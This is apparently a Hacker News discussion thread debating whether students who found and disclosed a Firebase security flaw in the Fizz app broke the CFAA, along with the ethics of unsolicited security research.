I'm not a lawyer, but I am professionally interested in this weird branch of the law, and it seems like EFF's staff attorney went a bit out on a limb here:
* Fizz appears to be a client/server application (presumably a web app?)
* The testing the researchers did was of software running on Fizz's servers
* After identifying a vulnerability, the researchers created administrator accounts using the database activity they obtained
* The researchers were not given permission to do this testing
If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
At least three things mitigate their legal risk:
1. It's very clear from their disclosure and behavior after disclosing that they were in good faith conducting security research, making them an unattractive target for prosecution.
2. It's not clear that they did any meaningful damage (this is subtle: you can easily rack up 5-6 figure damage numbers from unauthorized security research, but Fizz was so small and new that I'm assuming nobody even contemplating retaining a forensics firm or truing things up with their insurers, who probably did not exist), meaning there wouldn't have been much to prosecute.
3. Fizz's lawyers fucked up and threatened a criminal prosecution in order to obtain a valuable concession fro the researchers, which, as EFF points out, violates a state bar rule.
I think the good guys prevailed here, but I'm wary of taking too many lessons from this; if this hadn't been "Fizz", but rather the social media features of Dunder Mifflin Infinity, the outcome might have been gnarlier.
A friend points out that the limb EFF was out on was sturdy indeed, since DOJ has issued a policy statement saying they're not going after good-faith security research.
To me that reads less as "this is legal" and more as "this is illegal, but we (the executive branch of the government) will be nice and not go after you for it as long as we think you're a good guy". That's (arguably) better than nothing, but not exactly an ideal way to structure our justice system in my opinion.
Yes, but I don't see a better solution. If we make "security research" legal, then any hacker can just say "oh I was just going to disclose my findings to them".
Knowing the audience of this forum, you’re probably American and under 35. You have lived your whole life with an inoperable legislator. The US Congress, through a mixture of time-honored traditions with unfathomable externalities (there can never be more than this amount of representatives) and disinterested sports-like politics, is unable to print new laws in a reactive fashion. This means that kludges, with their own unfathomable externalities, look like sane solutions. They’re not. A functioning democracy would set up a legal framework for ethical research.
Not really, many professional researchers notify law enforcement when engaging in something that could be viewed as illegal or generate calls to the police.
What should happen is the addition of a "reasonable" standard and using existing case law policy positions to not prosecute people who have a reasonable basis supporting their claim of security research.
Instead we'll be left with the lazy lawmakers doing nothing and the executive saying they'll prosecute only the people who "deserve" it.
Any time you see that word you can be pretty sure that the matter under consideration is a fact question for the jury. The reason you hate that word is because you prefer hard and fast, bright line rules. That’s fine, I do too.
Reasonable just means there’s no good way to have a bright line rule and we have to consider these questions one at a time, in context.
Given that most cases never go to trial, and the possibility of long prison sentences and large fines are used as threats against individuals, the idea that a jury might find it "reasonable" is small solace to someone facing multiple charges of violating the CFAA, with corresponding jail time and fines. Weev was sentenced to 3.4 years of prison time and a fine of $73,000 for the crime of downloading a sequentially numbered unprotected data set. Though the sentence was later reduced, he still went to prison for a non-zero amount of time.
The prosecutor has a vested interest in making you look like a bad person. Even if there is no evil in your heart, they will dig into your history and find some dirt, then lie and twist your words to make you into some sort of evil hacker, so that the "reasonable" people on your jury, seeing the prosecutor's version of you, is going to think you deserve prison time.
Is the inference here that the evil in weev’s heart was put there by a criminal prosecutor? That was quite a trick.
It’s a real shame that weev didn’t have someone who was in his corner who was interested in making him look completely innocent. It seems like the system is rigged!
The use of "reasonable" in generally used to qualify some standard of behavior or conduct that is expected from individuals in specific situations. Because "reasonable" is inherently subjective, the responsibility for making the determination is (generally) passed over to a jury who will weigh what the prosecution and defense have presented which entails previous cases, the specific fact pattern of the case being deliberated, etc.
There are also situations where an actual judge makes the determination but generally, in a criminal context, it's up to a jury.
I don’t think you’re viewing it quite correctly. Reasonableness standards usually exist in order to funnel legal compulsion into a narrower range than would exist without them. It can bracket out behavior that to the average, ordinary, everyday member of that particular community would be extreme on one end or the other. You generally don’t want the law to require people to behave in extraordinarily heroic or extraordinarily cautious ways compared to how an ordinary person under similar circumstances would act. And “ordinary” here is also context-sensitive. What’s reasonable for an ordinary teenager may be extremely impulsive or foolish for an ordinary adult. Or what’s reasonable for an ordinary expert in a field may be wildly dangerous, say, for an ordinary layman.
All that said, though, reasonableness standards exist all over the law and don’t all necessarily serve the same purpose or function exactly in the same way, when you get into the weeds.
Similar in flight rules: one cannot fly a paraglider over "congested area". But what is "congested area" is intentionally not defined in the rules, and left up to judges to decide for each case separately.
Because if FAA tries to come up with a definition, there will always be weird unjust corner cases. Or just ban the paragliders whatsoever. I think the current ambiguity is the best compromise.
Judges typically consider matters of law. Usually “reasonable” is a cue that you are discussing a matter of fact, which is the province of the jury.
Sometimes you will have something called a bench trial, where it is agreed that the judge will also serve the role of the fact finder, and there will be no jury.
> Usually “reasonable” is a cue that you are discussing a matter of fact, which is the province of the jury.
And then there are motions for a JMOL (see FRCP 50), where a judge has to decide whether a “reasonable jury” could have a legally sufficient basis to find in favor of a party.
I generally hate it too. But it is better than "it's illegal, but we won't prosecute researchers". Note that "researchers" is also undefined. Reasonable would be one step up for the even worse status quo.
Well, the thing about making security research legal is that the law can outline what is legal and illegal security research, instead of leaving it in a grey area of a policy statement that may change at any time without notice, or from a political agenda.
A well executed law change will make it very clear where the line is to get into illegal territory and would likely include industry feedback in the drafting. The downside is it could also go the other way, policy changes are executed by politicians who likely have a fairly poor grasp of the tech and industry, and could leave the policy in a worse shape until tested by the court system.
If the law were to say outline steps the hacker must do, barriers that can't cross, it may actually make it harder for a hacker to say I was just doing research.
Laws are written by legislators, not the Department of Justice. An administrative decision by the executive branch does not change that fact. Accessing a computer system without explicit authorization or "hacking" is a federal crime. If you "hack", you can be charged with a felony for doing so at the discretion of federal prosecutors. The law isn't some magical too-incomprehensible-for-mortals text requiring magicians and soothsayers to interpret _literally_ every single clause and statement for you. As an adult citizen of a country (with an IQ above room temperature), you should be able to correctly interpret statements like the above, as was done by the person to whom you replied.
So then you’d concede that all that’s left is these Fizzbuzz people are liars and are bad people, and that their product is crap and should not be used, and you don’t need to have personally used the app nor met them personally to know any of that, since it’s all clear from their extremely obnoxious, self destructive conduct, and that that’s just an opinion and not a forecast on whether or not their useless investors will get a return?
Yeah definitely. It’s just to say that the security researchers, these classmates, didn’t get lucky. Like if I were a Stanford student, and I heard about this shitty website, you know, if I were generalizing, I wouldn’t be wrong to guess it was run by obnoxious people and that the technology was a big lie.
And this website, this forum, it has a maligned love affair with the anti establishment characters, and it can’t really figure out this one because it’s dropouts v. hackers on the face of it. Most of the comments are litigating the law, by non lawyers and even when by lawyers, by people who absolutely could not predict the future of a legal decision. Why not just trust your gut? What I want to hear - what I want to be the #1 comment forever and for all time, which is just my opinion - is like, this research never needed to happen to know that Fizz or whatever is absolute trash. Do you see what I am saying?
There are a lot of 18-22 year olds pursuing entrepreneurship out of college aged vengeances. Y Combinator funds many such founders! And here we see the double edged sword: if you’re at Stanford touting yourself an entrepreneurial genius with your app about antagonizing your classmates, you had better actually bring the bacon to your supposed technology. Because you have more than your founding team’s worth of classmates who hate your guts, but can actually program.
> this is subtle: you can easily rack up 5-6 figure damage numbers from unauthorized security research, but Fizz was so small and new that I'm assuming nobody even contemplating retaining a forensics firm or truing things up with their insurers, who probably did not exist
This seems like a problem with the existing law, if that's how it works.
It puts the amount of "damages" in the hands of the "victim" who can choose to spend arbitrary amounts of resources (trivial in the scope of a large bureaucracy but large in absolute amount), providing a perverse incentive to waste resources in order to vindictively trigger harsh penalties against an imperfect actor whose true transgression was to embarrass them.
And it improperly assigns the cost of such measures, even to the extent that they're legitimate, to the person who merely brought their attention to the need for them. If you've been operating a publicly available service with a serious vulnerability you still have to go through everything and evaluate the scope of the compromise regardless of whether or not this person did anything inappropriate, in case someone else did. The source of that cost was their own action in operating a vulnerable service -- they should still be incurring it even if they discovered the vulnerability themselves, but not before putting it in production.
The damages attributable to the accused should be limited to the damage they actually caused, for example by using access to obtain customer financial information and committing credit card fraud.
A forensics investigation is usually required by insurers. It's not an arbitrary amount of money, it's just an amount you're not happy with. I understand why you feel that way, but it's not the way the law works.
Services can negotiate the terms of their insurance contract or even choose whether or not to carry insurance. They agree to these terms and know the implications, and again, if the need for the investigation is legitimate then they should be conducting it regardless of how the vulnerability is uncovered.
You were talking about both but you were mistaken about the rule as well. Your focus on causation suggests you’re struggling with the idea that a second order event stemming from a breach could be compensatory damages, but of course it would fall within consequential damages if causation was found to be sufficiently attenuated.
You're just misreading the post. The "victim" doesn't calculate the damages, but a rule that makes the damages depend on actions the corporation voluntarily chooses to take allows them to vindictively maximize the penalties on someone who merely embarrassed them. Which is a perverse incentive that should be removed.
Yeah, I guess you’re right. It would be more fair to the defendant to let him specify the damages. After all, he is the only one who knows what harm he intended to inflict. Without that knowledge, how could we establish causation?
If you leave the door open to your building and some kids get in and spray paint graffiti on the walls and steal the building manager's library book, you pretty clearly have damages in the amount of the cost to clean the graffiti and the cost of the library book.
If you then go spend $50,000 to pay a contractor to sweep the building for bugs on the off chance the kids were actually Russian spies, that's on you for leaving the door open. Even if you have a legitimate fear of Russian spies.
Likewise, if the way you clean the graffiti is not to pay someone $50 to paint over it but to bring in a demolition crew to implode the whole building and then build an identical one in its place at the cost of a million dollars, this was your choosing and not the doing of the miscreants.
I presume that the "limb" the EFF attorney went on is basically what would've been disputed in a court of law. It's easily argued that if an app is so badly configured that just _following the Firebase protocol_ can give you write access to the database, you haven't actually circumvented any security measures, because _there weren't any to circumvent_.
It reminds me of the case where AT&T had their iPad data subscriber data just sitting there on an unlisted webpage. Don't remember which way it went, but I think the guy went out of his way there to get all the data he could get, which isn't the case here.
IANAL, but the law does not require you to "circumvent" anything[1].
Simply, anyone who "accesses a computer without authorization ... and thereby obtains ... information from any protected computer" is in violation of the CFAA.
If the researchers in question did not download any customer data, nor cause any "damages", I am not sure they are guilty of anything. BUT, if they had, "the victim had insufficient security measures" is not a valid defense. These researchers were not authorized to access this computer, regardless of whether they were technically able to obtain access.
Leaving your door unlocked does not give burglars permission to burgle you.
That's my understanding of the law. Even the "merge this PR without review using your administrator privileges" is potentially a crime if the company policy doesn't allow you to take that action. Basically, what the code does or intends is not a factor at all, only the potentially-implicit authorization policy controls.
If I tell you "the password on the postgres account at postgres.jrock.us is blahblah42" and you read the database, it could be argued that you're exceeding your authorized access. The reason people don't tell you their database password on Hacker News is because of countries that don't have that law, I assume.
> The reason people don't tell you their database password on Hacker News is because of countries that don't have that law, I assume.
That's silly, the reason people protect themselves is so that they are protected. Legal protection is another different kind of protection, but I think it's a deep stretch to argue that one can remove all the technical protections and still keep access to the CFAA and obtain meaningful protection from the law.
> protected computer
If you're suggesting that the CFAA itself protects the computer by definition, then you've excluded the possibility of a such thing as an "unprotected computer" which renders the extra word unnecessary. I don't think that's the intention, that all computers gain the implicit protection, I think there actually needs to be a policy or standard enforced, or ownership made clear.
In the tradition of US property law, I think you need to do the bare minimum of posting "NO TRESPASSING" signs at the border so anyone that walks by them can be said to have observed the difference between your space and the public spaces surrounding it (which they are permitted to be in, just like your private property so long as it's unprotected and they haven't been asked to leave before...)
> In the tradition of US property law, I think you need to do the bare minimum of posting "NO TRESPASSING" signs at the border
I guess the law went for an allowlist instead of a denylist this time. Plus one point on their security audit!
> protected computer
As an aside, sometimes I wonder why people make threats like "you must not link to this site without permission". It's like saying "you must not look at my house as you walk by it". You can ask, but it's Not A Thing. I worry that the language could potentially confuse a court someday. (Or that it already did.)
The term "protected computer" is defined in the CFAA act[1].
Basically its any computer used by a bank, the federal government, or used in interstate commerce.
This is just a quirk of the US system of government. If it doesn't fit those criteria, its going to be up to the state to prosecute based on the state's own version of the cfaa.
This is such a horrible standard. Imagine I put up a web server and only intend myself to access it. I put no security on the pages. Is Google guilty of a CFAA violation for visiting the site?
The law is not a computer program. It sometimes relies on the ambiguity of human language, and uses human judges & juries to make reasonable decisions within that ambiguity.
I think, in your scenario, you would have a hard time convincing a jury that Google's access to your computer is unauthorized.
The same argument could be made about the security research in the article. I think the majority of potential juror would never find someone guilty or liable for this, but there is always the risk that you are unlucky and end up with 12 who would.
They were authorized, as per the permissions that fizz gave users of the app on firebase. A group of users noticed that it was overly permissive and reported it to them.
> Leaving your door unlocked does not give burglars permission to burgle you.
This is more like giving your stuff away and then reporting it as theft.
It's nothing like that. Fizz did not want these people making admin accounts on their server. That's the bottom line. They failed to prevent it (forgot to lock their door), but in no way did they actively "give their stuff away". No judge would see it that way.
> That's the bottom line. They failed to prevent it (forgot to lock their door) but in no way did they actively "give their stuff away"
A better analogy is that the bank forgot to lock their frontdoor, failed to install a security system, and failed to secure their vault.
That our laws have zero accountability for these “banks”, even for good faith tap on the shoulder, is the ongoing failure of information security and our legal system.
It is true that leaving your door unlocked does not give burglars permission to burgle you, but how is an open door different than a closed door?
Legally, I think it's also true that an open door looks more like an invitation to enter (and it's different from burglary to simply poke your head in the door, see if anything is wrong, and not breaking or taking anything)
If an API is served on a public network and your client hits that API with a valid request which returns 200 (not 401) and that API is shaped like an open door, such that no "knock" or similar magic or special protection-breaking incantations were required in order to obtain "the access" ...
Then would you concede it's not actually like a burglary, but a bit more like going in through an open door to see if everyone is OK? (It sounds like that's more precisely what happened here, I'll admit I haven't read it all...)
This isn't complicated. You can be convicted of breaking & entering through an open door. At trial, your defense will have to convince a jury that a reasonable person would believe they were entitled to go through the door. If the door was to, say, a Starbucks, that defense will be compelling indeed. If it is to a private home owned by strangers, you'll be convicted.
I think that's roughly how it will play out in a CFAA case too: the case will turn on why it was you thought you were authorized to tinker with the things you tinkered with. If, as is so often encouraged on HN, your defense turns on the meanings of HTTP response codes, you'll likely be convicted. On the other hand, if you can tell a convincing story about how anybody who understands a little about how a browser works would think that they were just taking a shortcut to something the site owner wanted them to do anyways, you're much more likely to be OK.
If you create an admin account in the database, it won't much matter what position the door was in, so to speak.
The concept we're dancing around here is mens rea.
(Again: DOJ has issued a policy statement saying they're not going after cases like this Fizz thing, so this is all moot anyways.)
I don't think it's that simple. The prosecution will have to prove the intent to commit a crime. If it looks like a service that should require authorization, and the door is swinging wide open, I think there's a decent argument to be made that you can't prove a reasonable neighbor's intent wasn't to perform a welfare check, and with no criminal intent there is no crime of burglary.
If my neighbor leaves his door open (in the winter, say), and I have cause to believe that something is wrong based on that, is a jury going to convict me for going in there to check on them? It really sounds like that's what was done here.
I guess creating an admin account while I'm in there is a bit like making a key for myself while I look around. That might be over the line. But without that step, I'm not sure how you can have proved that something was even wrong...
The crime in this case is accessing software running on someone else's computer without their authorization. The "someone else" in this case vehemently objects to the access at issue. The burden of proof is on the prosecution, but their argument is compelling enough that it's the defendant who'd have to do the explaining.
No: you will not get convicted checking on your neighbor. Everybody involved in that fact pattern will believe that you at the time believed it was OK for you to peek into their house. Now change the fact pattern slightly: you're not a neighbor at all, but rather some random person walking down the street. A lot less clear, right?
Anyways that's what these cases are often about: the defendant's state of mind.
Note here that this is a Firebase app, so while it's super obvious to me that issuing an INSERT or UPDATE on a SQL database would cross a line, jiggling the JSON arguments to a Firebase API call to flip a boolean is less problematic, since that's how you test these things. The problem in the SQL case is that as soon as you're speaking SQL, you know you've game-overed the application; you stop there.
> Now change the fact pattern slightly: you're not a neighbor at all, but rather some random person walking
It's times like these I regret that neighbors don't talk to each other anymore. How can we even have functioning internet if we don't have network neighborhood...
> The prosecution will have to prove the intent to commit a crime.
Friendly amendment: Generally, the prosecution must prove only the intent to take the action that's proscribed by law (and sometimes, the intent to achieve the specific outcome of the action). Proving that the actor intended to commit a crime is usually not part of the prosecution's burden. [0]
> You can be convicted of breaking & entering through an open door.
That does not appear to be the case in Massachusetts. Here are the jury instructions relevant to B&E in the nighttime, with the full link below:
To prove the defendant guilty of this offense, the
Commonwealth must prove four things beyond a reasonable doubt:
First: That the defendant broke into someone else’s (building)
(ship) (vessel) (vehicle);
Second: That the defendant entered that (building) (ship) (vessel)
(vehicle);
...
To prove the first element, the Commonwealth must prove
beyond a reasonable doubt that the defendant exerted physical force,
however slight, and thereby removed an obstruction to gaining entry
into someone else’s (building) (ship) (vessel) (vehicle). Breaking
includes moving in a significant manner anything that barred the way
into the (building) (ship) (vessel) (vehicle). Examples would include
such things as (opening a closed door whether locked or unlocked)
(opening a closed window whether locked or unlocked) (going in
through an open window that is not intended for use as an entrance).
On the other hand, going through an unobstructed entrance such as
an open door does not constitute a breaking.
(Italicized emphasis is mine.) Entering through an open door appears to be an entering (the second element of the crime), but not a breaking (the first element). IANAL.
> You can be convicted of breaking & entering through an open door.
This definitely must vary by state. At least in Michigan that would just be trespassing. I know, because I had some very in-depth conversations with my lawyer about whether I had committed trespassing or B&E while exploring steam tunnels underneath a university. In my case, B&E couldn't apply because the door was unlocked. I also committed no other crimes besides simple trespassing.
You're totally right. The more accurate thing to say is "you could be convicted of residential burglary by walking through an open door if the prosecution could convince a jury you did so with the intent to commit a further crime".
That sounds right. I also appreciate how much you regularly add to discussion about the CFAA. I personally think it's a horrible law, but for the most part my understanding of it matches yours. Too many people mix up what "should be" vs. "what is".
In general, I've learned that if you ever wonder whether you might be breaking the CFAA, you are in violation of the CFAA. The only time this logic has ever failed that I've seen was HiQ vs. LinkedIn.
Yes, I think your description is perfectly reasonable. You could make a convincing argument that the researchers poked their head in to an open door. The fact that the law requires you to steal data or otherwise cause damages would support this idea.
I just wanted to argue against the idea that an unprotected computer is fair game for hacking. Morally and legally, it is not.
I do think you adding "if they took data" to this is a bit odd given the original post makes it very clear their defense relied on not taking data or changing anything.
Not a lawyer ofc, but I would not expect that line of reasoning to hold up in court as I wouldn't expect "the door was unlocked, your honor" to excuse trespassing.
So every URL is a trespass unless you have explicit permission?
If you say the protocol determines authorization, then the Fizz protocol granted them authorization. I don't have a clear answer here because it is messy.
Its not all or nothing. The law is literally decided on a case by case basis.
Going to the home page of a public website is clearly authorized access. Creating admin users for yourself on someone else's server without permission is clearly unauthorized access. Any judge or jury would agree.
That's not how CFAA works. Under CFAA if there was anything to indicate that permission is required to access the system, then that's enough even if no actual security features were implemented.
Ascii convention to emphasize text, similar to doing the same thing with asterisks. Markdown later used this syntax for italics and bold, which popularized it further.
Good analysis. I’m really confused why in the 2020s anybody thinks that unsolicited pentesting is a sane or welcome thing to do.
The OP doesn’t seem to have a “mea culpa” so I hope they learned this lesson even if the piece is more meme-worthy with a “can you believe what these guys tried to do?” tone.
While their intent seems good, they were pretty clearly breaking the law.
While what you say is true, I feel strongly that it shouldn't be. It is morally right to show if a product that is used by many fellow students is marketed as "100% secure"* is in fact very vulnerable.
If some less ethical hackers got a hold of that data, much worse things could have happened.
* that's the biggest red flag. A company saying 100% obviously has very little actual security expertise.
PS: I'm a big fan of Germany's https://www.ccc.de/en/ who have pulled many such hacks against some of the biggest tech companies.
I get into your home by bypassing (poor) security. I take pictures and make copies of anything inside. Then I publicly announce the breach and demand that you fix your security based on a deadline I made up. Then I say "trust me, bro" when I promise to never reveal the data I stole.
Nobody would find any of that moral. The analogy breaks down because your home is not a place where sensitive data of lots of people is stored. But even then if you'd do the same thing in a physical place where this would be the case, you'd simply be arrested, if not (accidentally) shot.
I do agree that these security researchers are ultimately doing a good thing, but they should not be this naive and aggressive about it.
Your analogy misses some key details. It is much less absurd if I am storing valuable items and documents for everyone in the neighborhood while publicly proclaiming my house is more secure than a bank vault. Meanwhile I can't even be fucked to lock the door when I'm away.
I'd say you checking the front door to find it unlocked, then taking a few pictures for proof is perfectly moral. In this case, I think most people would agree it is a step too far to expect you to come to me first, rather than immediately announcing to the entire neighborhood that I'm being incredibly lazy and reckless with their valuables (on top of outright lying to all of them).
> So we did what any good security researcher does: We responsibly disclosed what we found. We wrote a detailed vulnerability disclosure report. We suggested remediations. And we proactively agreed not to talk about our findings publicly before an embargo date to give them time to fix the issues. Then we sent them the report via email.
This is why the whole “I can’t believe my classmates threatened legal action” line of thinking doesn’t make sense. They weren’t acting like classmates themselves. They were acting like professionals. I imagine the embargo date wasn’t well-received.
It’s also interesting that they listed all of the steps they followed that a “good security researcher” would do. So why didn’t they start with communication first before trying to hack the system? Good security researchers do that. (Not all of the time, obviously.)
> Well, a me and few security-minded friends were drawn like moths to a flame when we heard that. Our classmates were posting quite sensitive stories on Fizz, and we wanted to make sure their information was secure.
> So one Friday night…
And this is where the “good-faith security research” line of reasoning broke down for me. Think about the wording. To my ears/eyes, those sentences above seem like a carefully crafted but still flimsy excuse. It’s like a lie that you tell yourself over and over so much that you end up believing it. It seems like the researchers just wanted to have some fun on a Friday night (like he said). (And there’s nothing wrong with that. But to characterize it as only doing “good faith security research” seems like a stretch.) I guess I’m saying that I’m just not convinced. I don’t buy it.
But I get it. Articles need to be written. Talks needs to be given.
(And yes, I do believe that Fizz didn’t need to threaten legal action.)
> So why didn’t they start with communication first before trying to hack the system? Good security researchers do that. (Not all of the time, obviously.)
I don't think that is true. I think it would be very unusual for an independent (not a pentester) security researcher to communicate anything before they have any findings.
> It seems like the researchers just wanted to have some fun on a Friday night (like he said). (And there’s nothing wrong with that. But to characterize it as only doing “good faith security research” seems like a stretch.)
I don't get it. Good faith research is fun. Most people don't get into the industry because they hate the work. I don't even understand what you are trying to imply was in their mind that would disqualify their actions from being in good faith.
You do get some of what I said it seems like especially because you didn’t acknowledge my first paragraph that explained why they weren’t acting like classmates themselves (which was a major theme/point in the article/blog post lol. It’s in the title).
I don’t feel a need to fully address all of your comments (because the first one was just your opinion similar to my own opinion). We can each look up stats for this.
But your second comment (also an opinion as mine was) did stick out to me due to emotional/psychological/human reasons, I guess:
> Good faith research is fun.
I was speaking about intention. I’m not convinced that “research” (whether it was good or bad faith even) was the goal here.
(FYI, I know the author of the post said this was written and talked about before. All I did was form an opinion based on his summary of the events for this specific HN post. I assumed it would have all of the salient information. But if there’s something missing, please point it out.)
> especially because you didn’t acknowledge my first paragraph that explained why they weren’t acting like classmates themselves (which was a major theme/point in the article/blog post lol. It’s in the title).
Because it seemed very irrelavent to if they were good faith researchers. I dont know if i agree - critiquing classmates designs is a quintessential classmate activity - but regardless i don't understand how this connects to the rest of your point. Say they weren't acting as classmates. How does that change anything about if they were acting as good faith security researchers, which is the point under contention.
> All I did was form an opinion based on his summary of the events for this specific HN post
Just because its an opinion doesn't make you not responsible for it.
I don't know what was in these people's hearts and minds. They could be secretly evil for all i know. However i think its morally wrong to call someone immoral without positive evidence they were acting wrongly or had bad intentions. Yet you seem comfortable calling them immoral basically on the sole basis that the work took place on a friday and a misreading of a document that they referenced but not even in the part of the document they were referencing? You allege they have an ulterior motive but you don't even put forth what that motive might be. Like respectfully, i think that's kind of a shitty thing to do. These are real people and deserve to be judged based on the facts and what can be drawn from the facts.
> Because it seemed very irrelavent to if they were good faith researchers.
It’s not irrelevant if the author mentioned “classmates” several times to justify his viewpoint/emotions about the situation.
However, I was making 2 points in my original comment. The first was a critique about the author’s viewpoint that classmates did this to him. The second was about the intention of the author related to “good faith research”. Here’s why I did this. If you re-read the beginning of the author’s conclusion, he said this:
> Now let’s take a quick step back. (1) Getting a legal threat for our good-faith security research was incredibly stressful. (2) And the fact that it came from our classmates added insult to injury.
I added the numbers in () myself but you see there are 2 distinct ideas that the author is concluding here. Get it?
> Yet you seem comfortable calling them immoral
I never called anyone immoral or even implied it. If I thought so, then I would have just said it clearly.
I literally said that I didn’t know whether “research” was the main intention. I even said something to the affect of “whether it’s good or bad faith”.
I never placed any negative judgment on anyone. I even said “and there’s nothing wrong with having fun on a Friday night”. You seem to be misreading between the lines.
It’s interesting that you’re fixated on this but you haven’t commented on any of the other comments on this post that did call Fizz’s employees immoral. Someone even literally wrote a curse word (that starts with the letter “S”) to describe them.
If you remember, the original comment that I replied to said “Devil’s advocate”. That meant that this subthread was supposed to explore a viewpoint that others weren’t commenting as much.
If you had an issue with the original person who wrote the “Devil’s advocate” comment then you should reply to them. I only said that I “sort of” get his comment. I didn’t say I agree with everything he wrote.
> I never called anyone immoral or even implied it. If I thought so, then I would have just said it clearly.
Lets quote:
"To my ears/eyes, those sentences above seem like a carefully crafted but still flimsy excuse. It’s like a lie that you tell yourself over and over so much that you end up believing it"
You called them liars. Most people consider lying to be immoral. You implied they had ulterior motives. The implication is that these motives were evil because people don't lie about good motivations.
> However, I was making 2 points in my original comment.
Yes i know, but they are separate points that don't build on each other. I disagree with both but i only find one of the points objectionable and was only contending one of them. What, do you think that people can only fully disagree or agree with you? That people have to disagree or agree with both points.
> It’s interesting that you’re fixated on this but you haven’t commented on any of the other comments on this post that did call Fizz’s employees immoral.
I have not commented on literally every thread on the internet. You caught me. However just because someone called them immoral doesn't mean i find their comment objectionable.
That said, are you really trying to argue that two wrongs make a right? If you want me to conceed that there exists other bad people on the internet, i'll happily agree with that.
> If you remember, the original comment that I replied to said “Devil’s advocate”. That meant that this subthread was supposed to explore a viewpoint that others weren’t commenting as much.
No, it means the original commenter doesn't neccesarily agree with the view being espoused. Given you said you agree with said view, you are obviously not claiming to be playing devils advocate. In any case, devil's advocate isn't a blank cheque to behave any way you want.
> It’s interesting that you’re fixated on this but you haven’t commented on any of the other comments on this post that did call Fizz’s employees immoral.
But i don't have an issue with their comment. While i might not 100% agree with his metaphor, i think his comment was reasonable. He did not call them liars with no evidence. He did not misleadingly imply the authors agreed that one should only do security research covered by safe harbour provisions when they didn't. Etc.
I may disagree with them being immoral but i don't object to calling them such if backed up with reasonable argument. I object to calling them liars (or accusing them of any other moral sin) without evidence. That's something you did that most other people haven't, which is why i am fixated on your comment not theirs.
I think they should negotiate a security test beforehand. For their own sake but also to get a buy-in. And if a company categorically refuses, you can then publish that, or share that you worry about a lack of track record in known security audits. That's a professional way to hold them accountable.
Breaking into a system unannounced and then stating "do what I say...OR ELSE", is neither legal nor professional. When you're surprised that this will be perceived as an attack instead of being helpful, I don't know what to say.
> When you're surprised that this will be perceived as an attack instead of being helpful, I don't know what to say.
Correct. This is why I believe they (or at least some of them) weren’t actually surprised lol.
> If you can’t tell from his wisdom, it was not Cooper’s first time dealing with legal threats.
This is a quote from the post. The author acknowledged that his fellow researcher was experienced with interacting with lawyers for exactly this kind of scenario.
> I get into your home by bypassing (poor) security. I take pictures and make copies of anything inside. Then I publicly announce the breach and demand that you fix your security based on a deadline I made up. Then I say "trust me, bro" when I promise to never reveal the data I stole.
Otoh, it sounds really different if you break into your own home.
I think part of the issue is with everything in the cloud your data is no longer local (like it would have been back in the day), but you (or the custumer public) still has an interest in knowing if the data is secure, an interest that is at odds with the service provider who often has perverse incentives to not care about security.
I agree that there's friction between the greater public good and private interests.
But I don't agree with the reductive take that compromised security means companies don't care or are greedy. Companies that do care and have an army of security staff still fuck up.
The reality check is that security is incredibly complicated, expensive, very easy to do incorrectly.
If anything, us software developers should do some reflection on our software stack. It's honestly quite shit if it requires daily updates and a team of security gurus to not get it wrong.
> The reality check is that security is incredibly complicated, expensive, very easy to do incorrectly.
Indeed. Which is what i meant by perverse incentives. You can generally make more money by ignoring security or doing the bare minimum. Doing security right is expensive, and the consequences of doing it wrong are usually not that much at the end of the day (for the company anyways, the users might be screwed). All this adds up to rational actors under investing in security. And honestly it is hard to blame them.
A security researcher checking on Firestore permissions is basically the equivalent of an electrician walking into a grocery store and noticing sparking wires dangling and taped awkwardly, and imminent fire hazards that could result in catastrophic damages to people shopping at the store.
It is absolutely the right, and IMO, the duty, of security researchers to test every website, app, product and service that they use regularly to ensure the continued safety of the general public. This is too important of a field to have a "not my problem" attitude of just ignoring egregious security vulnerabilities so they can be exploited by criminals.
> I’m really confused why in the 2020s anybody thinks that unsolicited pentesting is a sane or welcome thing to do.
I was looking for a comment like this. You couldn't pay me enough to do this sort of thing in this day and age (unless working for a DoD or 3-letter agency contractor, which would have my back covered), nevermind to do it pro bono or bona fide or whatever it is that these guys had in mind (either way, it looks like they were not paid to do it).
This sort of action might still have been sort of ok-ish in the late '00s, maybe going into 2010, 2011, but when the Russian/Chinese/North Korean/Iranian cyber threats became real (plus the whole Snowden fiasco) then related laws began to change (both in the US and in Europe) and doing this sort of stuff with no-one to back you up for real (forget the EFF) meant that the one doing it would be asking for trouble in a big way.
What about due diligence? If you're about to send and store sensitive information with a service, a service that claims to be 100% secure.... shouldn't you have the right to verify that the security is up to snuff? These researchers weren't attempting to harm anybody. What's wrong with kicking the tires?
It’s both sane and welcome. the alternative to unsolicited testing is your app getting owned and your customer data being sold and you being sued into oblivion. unsolicited.
Your vulnerability doesn’t cease to exist because you don’t want people to look at it.
Personally I'd still probably not engage in unsolicited (still illegal by the letter of the law) pentesting with just the promise that the DoJ won't prosecute as long as they agree it was in good faith. But I agree that pinkie promise does make it a bit less risky.
Good analysis. One important caveat is that, while this may technically have been a CFAA violation, it's almost certainly not one the Department of Justice would prosecute.
Last year, the department updated its CFAA charging policy to not pursue charges against people engaged in "good-faith security research." [1] The CFAA is famously over-broad, so a DOJ policy is nowhere near as good as amending the law to make the legality of security research even clearer. Also, this policy could change under a new administration, so it's still risky—just less risky than it was before they formalized this policy.
If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
I am extremely not a lawyer but the pattern of legal posturing I've observed is that some lawyer makes grand over-reaching statements, the opposing lawyer responds with their own grand over-reaching statements.
"My clients did not violate the CFAA" should logically be interpreted as "good fucking luck arguing that my good faith student security researcher clients violated the CFAA in court".
Yeah, Firebase makes this much more of a gray area than a SQL database would, where you'd know instantly as soon as you issued an INSERT or an UPDATE that you were doing something unauthorized. The writeup is solid, you seem like you took most of the normal precautions a professional team would. The story has the right ending!
Did you check with the target before you "checked whether we could set `isAdmin` to `true` on our existing accounts?"
If you did not get consent from a subject, you are not a researcher. If you see a door and check to see if it is unlocked without its owner authorizing you to do so, you are on the ethical side of burglary even if you didn't burgle.
Helpfully the "technical writeup" post links to "industry best practices" [0] which include:
If you are carrying out testing under a bug bounty or similar program, the organisation may have established safe harbor policies, that allow you to legally carry out testing, as long as you stay within the scope and rules of their program. Make sure that you read the scope carefully - stepping outside of the scope and rules may be a criminal offence.
The ethically poor behavior of Fizz doesn't mitigate your own.
